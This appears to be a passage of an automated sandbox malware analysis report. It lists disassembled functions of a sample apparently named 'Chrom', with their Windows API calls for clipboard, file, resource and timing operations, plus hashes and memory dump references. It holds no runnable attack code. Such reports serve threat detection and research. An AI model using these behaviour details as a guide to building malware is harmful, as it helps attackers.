                                                                                                                                                          • Part of subcall function 00407AD0: CloseHandle.KERNEL32(000000FF,00407A60,00000000,00000000,0040BD9A,?,00000000,00000104,00000000,?,?,?,0040C27F,?,0040C401,000000FF), ref: 00407AD8
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,0040BD9A,?,00000000,00000104,00000000,?,?,?,0040C27F,?,0040C401,000000FF,?,00000104), ref: 00407ABD
                                                                                                                                                          • Part of subcall function 0040A8AE: ReadFile.KERNELBASE(?,?,?,00000000,00000000,?,?,0040D11F,?,?,00000000), ref: 0040A8C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2136311172-0
                                                                                                                                                        • Opcode ID: b5cb65a831526968e61f3b8b20486ca7c6747027f1051b4f106f0081e9cc041b
                                                                                                                                                        • Instruction ID: 35cd9f8c1dcfc8a6b291ae52797bf89ab5d951bbdcfd6650bf437470b2e439e1
                                                                                                                                                        • Opcode Fuzzy Hash: b5cb65a831526968e61f3b8b20486ca7c6747027f1051b4f106f0081e9cc041b
                                                                                                                                                        • Instruction Fuzzy Hash: 3601D6B1A182019EE3209B30C80579B77D8EF50315F14883FE596E62C1E77CA9808A7F
                                                                                                                                                        Function 0040B5F5 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040B671: ??3@YAXPAX@Z.MSVCRT(00000000,0040B5FD,00000000,0040700C), ref: 0040B678
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040700C), ref: 0040B5FE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@??3@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1936579350-0
                                                                                                                                                        • Opcode ID: 35078aa9528d176a3a2e80a839a21edae065cbdddee7803ec72af34415444393
                                                                                                                                                        • Instruction ID: 1651319002fec664f26f06c15537a8029accf68742c71f4261269a8637093df6
                                                                                                                                                        • Opcode Fuzzy Hash: 35078aa9528d176a3a2e80a839a21edae065cbdddee7803ec72af34415444393
                                                                                                                                                        • Instruction Fuzzy Hash: 1EC02B7281D2104FDB10FF74340145A23D4CE832203014C2FE4C0F3100D6384401039D
                                                                                                                                                        Function 0040B02A Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                        • Opcode ID: 7e96c0334e5700b3217717c12c936e5c8bc79841484eb53a37ab721f95e95596
                                                                                                                                                        • Instruction ID: a4aab80efa05a36e40e003174c8289b0fd75b8aa2e0c69bc48311badf276c503
                                                                                                                                                        • Opcode Fuzzy Hash: 7e96c0334e5700b3217717c12c936e5c8bc79841484eb53a37ab721f95e95596
                                                                                                                                                        • Instruction Fuzzy Hash: 3BC002B25117018BE7349E15C449766B3E8EF20B6BF61881D94E591481D7BCD4848A18
                                                                                                                                                        Function 00408D81 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                        • Opcode ID: 8bbca39f266a6f000b4c72b8d7a71c68e8e69029b91d150487a399c13b1e3803
                                                                                                                                                        • Instruction ID: de1c0baefddc23ff079bab1c2c377a9ae2e5f1a26b18513abd574526421c75a5
                                                                                                                                                        • Opcode Fuzzy Hash: 8bbca39f266a6f000b4c72b8d7a71c68e8e69029b91d150487a399c13b1e3803
                                                                                                                                                        • Instruction Fuzzy Hash: 39C002B2551B098FE7209E15C505762B3E8AF1073BF958D1D94D5914C1DB7CD4448E15
                                                                                                                                                        Function 0041729B Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                        • Opcode ID: df981978903576c94245b9e122b1d11dbdca9cb07129e532542aba849d07663a
                                                                                                                                                        • Instruction ID: 3aa5576ec611755f8cd3c559a3e90b43ca4d179dd92e5c4db0b995cbc1efbf24
                                                                                                                                                        • Opcode Fuzzy Hash: df981978903576c94245b9e122b1d11dbdca9cb07129e532542aba849d07663a
                                                                                                                                                        • Instruction Fuzzy Hash: 9C9002C2496519105D0431755C06505120C4852136375075A7032959D1CE1880506129

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00409EA1 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EmptyClipboard.USER32 ref: 00409EAB
                                                                                                                                                          • Part of subcall function 00409C82: CreateFileW.KERNELBASE(00000003,80000000,00000003,00000000,00000003,00000000,00000000,0040D0E2,0040118B,0040118B,?,?,?,?,000003FF), ref: 00409C94
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409EC8
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00409ED9
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409EE6
                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00409EF9
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00409F0B
                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409F14
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00409F1C
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00409F28
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00409F33
                                                                                                                                                        • CloseClipboard.USER32 ref: 00409F3C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3604893535-0
                                                                                                                                                        • Opcode ID: 44998ffc891bb225a56e9bb27206520a843834c4280dd8a38d2d5b5fef2c93d6
                                                                                                                                                        • Instruction ID: f2b573886a777ddc08947e4f1f5a0494481de075c88f5d4f6b384ba28402c1a7
                                                                                                                                                        • Opcode Fuzzy Hash: 44998ffc891bb225a56e9bb27206520a843834c4280dd8a38d2d5b5fef2c93d6
                                                                                                                                                        • Instruction Fuzzy Hash: C4112E7A904209FFEB105FA0EC4DA9F7BB8EB45351F104176F902E2292DB748D09CB68
                                                                                                                                                        Function 004053E1 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405400
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00405412
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405426
                                                                                                                                                        • #17.COMCTL32(?,00000002,?,?,?,004122D2,00000000,?,00000002,?,00446AC4,00000000,?,0000000A), ref: 00405434
                                                                                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00405451
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                        • API String ID: 2780580303-317687271
                                                                                                                                                        • Opcode ID: 5dfb1fab429fbac110f65632f4351b7de0d7d1b2a154ff3275be3e3fb28183c9
                                                                                                                                                        • Instruction ID: 02647c2cd5375a0cee16ec096afc735ec0ee25a180069e9de50cf8421b07617d
                                                                                                                                                        • Opcode Fuzzy Hash: 5dfb1fab429fbac110f65632f4351b7de0d7d1b2a154ff3275be3e3fb28183c9
                                                                                                                                                        • Instruction Fuzzy Hash: D801F4767516106BE7115BB4AC89BBB3A9CDF4674AB400035F502E6290EBBCDD098A6C
                                                                                                                                                        Function 0041A773 Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemTime.KERNEL32(?), ref: 0041A78D
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 0041A79C
                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0041A7AD
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041A7C0
                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0041A7D4
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041A7E7
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0041A7FD
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 0041A80D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4218492932-0
                                                                                                                                                        • Opcode ID: e75bf55485dc5d7d8b1ce748ae8fe2053cdeb53d697cd784200e391488fbf47e
                                                                                                                                                        • Instruction ID: 2cc184040992abe9e4e17126ecdb49144539f0c36084feaac1bb63b25c18b641
                                                                                                                                                        • Opcode Fuzzy Hash: e75bf55485dc5d7d8b1ce748ae8fe2053cdeb53d697cd784200e391488fbf47e
                                                                                                                                                        • Instruction Fuzzy Hash: 6E11B9F3D0051867DB00EFA4DC49DDAB7ADEF4A210F464936FA15C7141E634E64887E5
                                                                                                                                                        Function 00409E39 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EmptyClipboard.USER32 ref: 00409E41
                                                                                                                                                        • wcslen.MSVCRT ref: 00409E4E
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411571,-00000210), ref: 00409E5E
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409E6B
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411571,-00000210), ref: 00409E74
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00409E7D
                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409E86
                                                                                                                                                        • CloseClipboard.USER32 ref: 00409E96
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1213725291-0
                                                                                                                                                        • Opcode ID: 0164f3b3879468f6eceab2dbe93e6c2e0c32735ab1d54ab091d60a667f6ded84
                                                                                                                                                        • Instruction ID: ea904b1a76f59721029cddac23a3e6dc12fc942fabe90a21eef7b64a01167f20
                                                                                                                                                        • Opcode Fuzzy Hash: 0164f3b3879468f6eceab2dbe93e6c2e0c32735ab1d54ab091d60a667f6ded84
                                                                                                                                                        • Instruction Fuzzy Hash: 90F05B7B500228ABD2202FA5EC4DD5B776CDB86B9AB05013AF909D22529A245C0846B9
                                                                                                                                                        Function 0041A225 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A22E
                                                                                                                                                          • Part of subcall function 004192F2: GetVersionExW.KERNEL32(?), ref: 00419315
                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A255
                                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A27E
                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0041A299
                                                                                                                                                        • free.MSVCRT ref: 0041A2C7
                                                                                                                                                          • Part of subcall function 0041938B: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,004194B6,?), ref: 004193A9
                                                                                                                                                          • Part of subcall function 0041938B: malloc.MSVCRT ref: 004193B0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                        • String ID: OsError 0x%x (%u)
                                                                                                                                                        • API String ID: 2360000266-2664311388
                                                                                                                                                        • Opcode ID: 66a5431910ad0f0ce767ad32103e4c3a3757044076d62f59ce7878390095469b
                                                                                                                                                        • Instruction ID: 09a38d3d336ad90078d9ee04c195a6b5e61967dcbffd067f140ccdfba9bcaacc
                                                                                                                                                        • Opcode Fuzzy Hash: 66a5431910ad0f0ce767ad32103e4c3a3757044076d62f59ce7878390095469b
                                                                                                                                                        • Instruction Fuzzy Hash: 1211C834901228BFDF11ABA1DC49CEF7F78EF45760B104067F805A2211D7750E95D7A9
                                                                                                                                                        Function 00416A46 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindResourceW.KERNEL32(?,?,?), ref: 00416A53
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00416A64
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00416A74
                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00416A7F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                                        • Opcode ID: c89b420d8ff8532ca3e3af3ec0f8793a4f0b21527573ef5156956d1d610aacd0
                                                                                                                                                        • Instruction ID: 7a854b382b0c92d83852ff6be1e1e59c849c683da3176378bb1a11a70f524225
                                                                                                                                                        • Opcode Fuzzy Hash: c89b420d8ff8532ca3e3af3ec0f8793a4f0b21527573ef5156956d1d610aacd0
                                                                                                                                                        • Instruction Fuzzy Hash: D301D632600215ABCB158FA5DC4899BBF9EFF863A0709C03AFC45E6320DB30C984C6D8
                                                                                                                                                        Function 0041138D Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A004: GetTempPathW.KERNEL32(00000104,?,?), ref: 0040A01B
                                                                                                                                                          • Part of subcall function 0040A004: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040A02D
                                                                                                                                                          • Part of subcall function 0040A004: GetTempFileNameW.KERNELBASE(?,004011DE,00000000,?), ref: 0040A044
                                                                                                                                                        • OpenClipboard.USER32(?), ref: 004113CB
                                                                                                                                                        • GetLastError.KERNEL32 ref: 004113E0
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004113FF
                                                                                                                                                          • Part of subcall function 00409EA1: EmptyClipboard.USER32 ref: 00409EAB
                                                                                                                                                          • Part of subcall function 00409EA1: GetFileSize.KERNEL32(00000000,00000000), ref: 00409EC8
                                                                                                                                                          • Part of subcall function 00409EA1: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00409ED9
                                                                                                                                                          • Part of subcall function 00409EA1: GlobalLock.KERNEL32(00000000), ref: 00409EE6
                                                                                                                                                          • Part of subcall function 00409EA1: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00409EF9
                                                                                                                                                          • Part of subcall function 00409EA1: GlobalUnlock.KERNEL32(00000000), ref: 00409F0B
                                                                                                                                                          • Part of subcall function 00409EA1: SetClipboardData.USER32(0000000D,00000000), ref: 00409F14
                                                                                                                                                          • Part of subcall function 00409EA1: CloseHandle.KERNEL32(?), ref: 00409F28
                                                                                                                                                          • Part of subcall function 00409EA1: CloseClipboard.USER32 ref: 00409F3C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2633007058-0
                                                                                                                                                        • Opcode ID: 20d099faa1af22661b39900e4eb9d3841db7e32abb08b7b598010ec37cab23bc
                                                                                                                                                        • Instruction ID: 67aa2ef175f2399da1d40db2a93dbf2ce4f101bde76a1b907a1a325d03d0d586
                                                                                                                                                        • Opcode Fuzzy Hash: 20d099faa1af22661b39900e4eb9d3841db7e32abb08b7b598010ec37cab23bc
                                                                                                                                                        • Instruction Fuzzy Hash: B3F0F43530030496EB202B72DC4EFDB365DCB80711F00003ABA62961E2EE79EC858568
                                                                                                                                                        Function 004192F2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00419315
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
